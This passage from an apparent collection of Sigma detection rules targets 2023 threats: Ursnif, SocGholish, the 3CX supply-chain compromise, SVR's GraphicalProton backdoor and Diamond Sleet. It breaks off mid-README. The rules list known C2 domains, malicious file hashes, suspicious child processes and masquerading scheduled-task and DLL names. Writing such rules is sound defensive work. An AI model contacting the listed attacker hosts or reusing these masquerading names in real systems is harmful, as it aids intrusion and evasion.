    "path": "rules-emerging-threats/2023/Malware/Ursnif/proc_creation_win_malware_ursnif_cmd_redirection.yml",
    "content": "title: Ursnif Redirection Of Discovery Commands\nid: 7aaa5739-12fc-41aa-b98b-23ec27d42bdf\nstatus: test\ndescription: |\n    Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.\nreferences:\n    - Internal Research\nauthor: '@kostastsale'\ndate: 2023-07-16\ntags:\n    - attack.execution\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\explorer.exe'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '/C '\n            - ' >> *\\AppData\\local\\temp\\*.bin'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml",
    "content": "title: Potential SocGholish Second Stage C2 DNS Query\nid: 70761fe8-6aa2-4f80-98c1-a57049c08e66\nstatus: test\ndescription: Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic\nreferences:\n    - https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations\n    - https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations\n    - https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update\nauthor: Dusty Miller\ndate: 2023-02-23\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        Image|endswith: '\\wscript.exe'\n        QueryName|re: '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+'\n    condition: selection\nfalsepositives:\n    - Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/README.md",
    "content": "# 3CX Supply Chain Attack\n\n## Summary\n\nOn March 29, 2023 CrowdStrike detected malicious activity, originating from a legitimate, signed binary called 3CXDesktopApp. The binary is part of a softphone system developed by 3CX.\nThe observed malicious activity consisted of beaconing to infrastructure controlled by the actors, leading to the deployment of second-stage payloads and in a few cases direct on-keyboard activity from the attackers.\n\nYou can find more information on the threat in the following articles:\n\n- [CrowdStrike Falcon Platform Detects and Prevents Active Intrusion Campaign Targeting 3CXDesktopApp Customers - By Crowdstrike](https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/)\n- [3CX Supply Chain Compromise Leads to ICONIC Incident - By Volexity](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/)\n- [3CX VoIP Software Compromise & Supply Chain Threats - By Huntress](https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats)\n- [Using THOR Lite to scan for indicators of Lazarus activity related to the 3CX compromise - By Nextron Systems](https://www.nextron-systems.com/2023/03/31/using-thor-lite-to-scan-for-indicators-of-lazarus-activity-related-to-the-3cx-compromise/)\n- [Not just an infostealer: Gopuram backdoor deployed through 3CX supply chain attack - By Kaspersky](https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/)\n- [Elastic users protected from SUDDENICON’s supply chain attack - By Elastic](https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack)\n\n## Rules\n\n- [Potential Compromised 3CXDesktopApp Beaconing Activity - DNS](./dns_query_win_malware_3cx_compromise.yml)\n- [Malicious DLL Load By Compromised 3CXDesktopApp](./image_load_malware_3cx_compromise_susp_dll.yml)\n- [Potential Compromised 
3CXDesktopApp Beaconing Activity - Netcon](./net_connection_win_malware_3cx_compromise_beaconing_activity.yml)\n- [Potential Compromised 3CXDesktopApp Execution](./proc_creation_win_malware_3cx_compromise_execution.yml)\n- [Potential Suspicious Child Process Of 3CXDesktopApp](./proc_creation_win_malware_3cx_compromise_susp_children.yml)\n- [Potential Compromised 3CXDesktopApp Update Activity](./proc_creation_win_malware_3cx_compromise_susp_update.yml)\n- [Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy](./proxy_malware_3cx_compromise_c2_beacon_activity.yml)\n- [Potential Compromised 3CXDesktopApp ICO C2 File Download](./proxy_malware_3cx_compromise_susp_ico_requests.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml",
    "content": "title: Potential Compromised 3CXDesktopApp Beaconing Activity - DNS\nid: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise\nreferences:\n    - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\nmodified: 2023-03-31\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        QueryName|contains:\n            - 'akamaicontainer.com'\n            - 'akamaitechcloudservices.com'\n            - 'azuredeploystore.com'\n            - 'azureonlinecloud.com'\n            - 'azureonlinestorage.com'\n            - 'dunamistrd.com'\n            - 'glcloudservice.com'\n            - 'journalide.org'\n            - 'msedgepackageinfo.com'\n            - 'msedgeupdate.net'\n            - 'msstorageazure.com'\n            - 'msstorageboxes.com'\n            - 'officeaddons.com'\n            - 'officestoragebox.com'\n            - 'pbxcloudeservices.com'\n            - 'pbxphonenetwork.com'\n            - 'pbxsources.com'\n            - 'qwepoi123098.com'\n            - 'sbmsa.wiki'\n            - 'sourceslabs.com'\n            - 
'visualstudiofactory.com'\n            - 'zacharryblogs.com'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml",
    "content": "title: Malicious DLL Load By Compromised 3CXDesktopApp\nid: d0b65ad3-e945-435e-a7a9-438e62dd48e9\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\nstatus: test\ndescription: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp\nreferences:\n    - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-31\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Hashes|contains:\n            # ffmpeg.dll\n            - 'SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896'\n            - 'SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429'\n            - 'MD5=74BC2D0B6680FAA1A5A76B27E5479CBC'\n            # d3dcompiler_47.dll\n            - 'SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03'\n            - 'SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E'\n            - 'MD5=82187AD3F0C6C225E2FBA0C867280CC9'\n            # Inner object from ffmpeg.dll\n            - 'SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952'\n            - 'SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30'\n            - 'MD5=11BC82A9BD8297BD0823BCE5D6202082'\n            # 
ICONIC Stealer payload\n            - 'SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423'\n            - 'SHA1=3B3E778B647371262120A523EB873C20BB82BEAF'\n            - 'MD5=7FAEA2B01796B80D180399040BB69835'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml",
    "content": "title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon\nid: 51eecf75-d069-43c7-9ea2-63f75499edd4\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise\nreferences:\n    - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\nmodified: 2023-03-31\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\3CXDesktopApp.exe'\n        DestinationHostname|contains:\n            - 'akamaicontainer.com'\n            - 'akamaitechcloudservices.com'\n            - 'azuredeploystore.com'\n            - 'azureonlinecloud.com'\n            - 'azureonlinestorage.com'\n            - 'dunamistrd.com'\n            - 'glcloudservice.com'\n            - 'journalide.org'\n            - 'msedgepackageinfo.com'\n            - 'msstorageazure.com'\n            - 'msstorageboxes.com'\n            - 'officeaddons.com'\n            - 'officestoragebox.com'\n            - 'pbxcloudeservices.com'\n            - 'pbxphonenetwork.com'\n            - 'pbxsources.com'\n            - 'qwepoi123098.com'\n            - 'sbmsa.wiki'\n            - 'sourceslabs.com'\n 
           - 'visualstudiofactory.com'\n            - 'zacharryblogs.com'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml",
    "content": "title: Potential Compromised 3CXDesktopApp Execution\nid: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects execution of known compromised version of 3CXDesktopApp\nreferences:\n    - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_hashes:\n        Hashes|contains:\n            # 3CX Desktop 18.12.407\n            - 'SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC'\n            - 'SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02'\n            - 'SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE'\n            - 'SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859'\n            - 'SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187'\n            - 'SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA'\n            - 'MD5=BB915073385DD16A846DFA318AFA3C19'\n            - 'MD5=08D79E1FFFA244CC0DC61F7D2036ACA9'\n            - 'MD5=4965EDF659753E3C05D800C6C8A23A7A'\n            # 3CX Desktop 18.12.416\n            - 
'SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405'\n            - 'SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734'\n            - 'SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203'\n            - 'SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1'\n            - 'SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB'\n            - 'SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5'\n            - 'MD5=9833A4779B69B38E3E51F04E395674C6'\n            - 'MD5=704DB9184700481A56E5100FB56496CE'\n            - 'MD5=8EE6802F085F7A9DF7E0303E65722DC0'\n            # 3CXDesktopApp MSI\n            - 'SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868'\n            - 'SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983'\n            - 'SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA'\n            - 'SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E'\n            - 'MD5=F3D4144860CA10BA60F7EF4D176CC736'\n            - 'MD5=0EEB1C0133EB4D571178B2D9D14CE3E9'\n    selection_pe_1:\n        - OriginalFileName: '3CXDesktopApp.exe'\n        - Image|endswith: '\\3CXDesktopApp.exe'\n        - Product: '3CX Desktop App'\n    selection_pe_2:\n        FileVersion|contains: '18.12.'\n    condition: all of selection_pe_* or selection_hashes\nfalsepositives:\n    - Legitimate usage of 3CXDesktopApp\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml",
    "content": "title: Potential Suspicious Child Process Of 3CXDesktopApp\nid: 63f3605b-979f-48c2-b7cc-7f90523fed88\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise\nreferences:\n    - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\n    - https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\3CXDesktopApp.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml",
    "content": "title: Potential Compromised 3CXDesktopApp Update Activity\nid: e7581747-1e44-4d4b-85a6-0db0b4a00f2a\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software\nreferences:\n    - https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/\n    - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\3CXDesktopApp\\app\\update.exe'\n        CommandLine|contains|all:\n            - '--update'\n            - 'http'\n            - '/electron/update/win32/18.12'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/proxy_malware_3cx_compromise_c2_beacon_activity.yml",
    "content": "title: Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy\nid: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26\nrelated:\n    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise\nreferences:\n    - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-29\nmodified: 2023-05-18\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-host|contains:\n            - 'akamaicontainer.com'\n            - 'akamaitechcloudservices.com'\n            - 'azuredeploystore.com'\n            - 'azureonlinecloud.com'\n            - 'azureonlinestorage.com'\n            - 'dunamistrd.com'\n            - 'glcloudservice.com'\n            - 'journalide.org'\n            - 'msedgepackageinfo.com'\n            - 'msstorageazure.com'\n            - 'msstorageboxes.com'\n            - 'officeaddons.com'\n            - 'officestoragebox.com'\n            - 'pbxcloudeservices.com'\n            - 'pbxphonenetwork.com'\n            - 'pbxsources.com'\n            - 'qwepoi123098.com'\n            - 'sbmsa.wiki'\n            - 'sourceslabs.com'\n            - 'visualstudiofactory.com'\n            - 'zacharryblogs.com'\n    
condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/3CX-Supply-Chain/proxy_malware_3cx_compromise_susp_ico_requests.yml",
    "content": "title: Potential Compromised 3CXDesktopApp ICO C2 File Download\nid: 76bc1601-9546-4b75-9419-06e0e8d10651\nrelated:\n    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2\n      type: similar\n    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2\n      type: similar\n    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2\n      type: similar\n    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec\n      type: similar\n    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc\n      type: similar\n    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update\n      type: similar\n    - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad\n      type: similar\nstatus: test\ndescription: Detects potential malicious .ICO files download from a compromised 3CXDesktopApp via web requests to the the malicious Github repository\nreferences:\n    - https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/\n    - https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-31\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains|all:\n            - 'IconStorages/images/main/icon'\n            - '.ico'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Cozy-Bear/image_load_apt_cozy_bear_graphical_proton_dlls.yml",
    "content": "title: DLL Names Used By SVR For GraphicalProton Backdoor\nid: e64c8ef3-9f98-40c8-b71e-96110991cb4c\nstatus: test\ndescription: Hunts known SVR-specific DLL names.\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nauthor: CISA\ndate: 2023-12-18\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\AclNumsInvertHost.dll'\n            - '\\AddressResourcesSpec.dll'\n            - '\\BlendMonitorStringBuild.dll'\n            - '\\ChildPaletteConnected.dll'\n            - '\\DeregisterSeekUsers.dll'\n            - '\\HandleFrequencyAll.dll'\n            - '\\HardSwapColor.dll'\n            - '\\LengthInMemoryActivate.dll'\n            - '\\ModeBitmapNumericAnimate.dll'\n            - '\\ModeFolderSignMove.dll'\n            - '\\ParametersNamesPopup.dll'\n            - '\\PerformanceCaptionApi.dll'\n            - '\\ScrollbarHandleGet.dll'\n            - '\\UnregisterAncestorAppendAuto.dll'\n            - '\\WowIcmpRemoveReg.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml",
    "content": "title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor\nid: 8fa65166-f463-4fd2-ad4f-1436133c52e1\nrelated:\n    - id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142\n      type: similar\nstatus: test\ndescription: Hunts for known SVR-specific scheduled task names\nauthor: CISA\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\ndate: 2023-12-18\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID:\n            - 4698\n            - 4699\n            - 4702\n        TaskName:\n            - '\\defender'\n            - '\\Microsoft\\DefenderService'\n            - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'\n            - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'\n            - '\\Microsoft\\Windows\\ATPUpd'\n            - '\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update'\n            - '\\Microsoft\\Windows\\DefenderUPDService'\n            - '\\Microsoft\\Windows\\IISUpdateService'\n            - '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'\n            - '\\Microsoft\\Windows\\WiMSDFS'\n            - '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'\n            - '\\Microsoft\\Windows\\Windows Defender\\Service Update'\n            - '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'\n            - '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'\n            - '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'\n            - '\\Microsoft\\Windows\\WindowsDefenderService'\n            - '\\Microsoft\\Windows\\WindowsDefenderService2'\n            - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'\n            - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'\n            - '\\WindowUpdate'\n    condition: selection\nfalsepositives:\n    
- Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml",
    "content": "title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler\nid: 2bfc1373-0220-4fbd-8b10-33ddafd2a142\nrelated:\n    - id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 # Security-Audting Eventlog\n      type: similar\nstatus: test\ndescription: Hunts for known SVR-specific scheduled task names\nauthor: CISA\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\ndate: 2023-12-18\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: taskscheduler\n    definition: 'Requirements: The \"Microsoft-Windows-TaskScheduler/Operational\" is disabled by default and needs to be enabled in order for this detection to trigger'\ndetection:\n    selection:\n        EventID:\n            - 129 # Task Created\n            - 140 # Task Updated\n            - 141 # Task Deleted\n        TaskName:\n            - '\\defender'\n            - '\\Microsoft\\DefenderService'\n            - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'\n            - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'\n            - '\\Microsoft\\Windows\\ATPUpd'\n            - '\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update'\n            - '\\Microsoft\\Windows\\DefenderUPDService'\n            - '\\Microsoft\\Windows\\IISUpdateService'\n            - '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'\n            - '\\Microsoft\\Windows\\WiMSDFS'\n            - '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'\n            - '\\Microsoft\\Windows\\Windows Defender\\Service Update'\n            - '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'\n            - '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'\n            - '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'\n            - '\\Microsoft\\Windows\\WindowsDefenderService'\n            - 
'\\Microsoft\\Windows\\WindowsDefenderService2'\n            - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'\n            - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'\n            - '\\WindowUpdate'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/README.md",
    "content": "# Diamond Sleet APT\n\n## Summary\n\nDiamond Sleet (ZINC) is a North Korean nation-state threat actor that prioritizes espionage, data theft, financial gain, and network destruction. The actor typically targets media, IT services, and defense-related entities around the world.\n\nYou can find more information on the threat in the following articles:\n\n- [Multiple North Korean threat actors exploiting the TeamCity CVE-2023-42793 vulnerability](https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/)\n\n## Rules\n\n- [Diamond Sleet APT DNS Communication Indicators](./dns_query_win_apt_diamond_steel_indicators.yml)\n- [Diamond Sleet APT File Creation Indicators](./file_event_win_apt_diamond_sleet_indicators.yml)\n- [Diamond Sleet APT DLL Sideloading Indicators](./image_load_apt_diamond_sleet_side_load.yml)\n- [Diamond Sleet APT Process Activity Indicators](./proc_creation_win_apt_diamond_sleet_indicators.yml)\n- [Diamond Sleet APT Scheduled Task Creation - 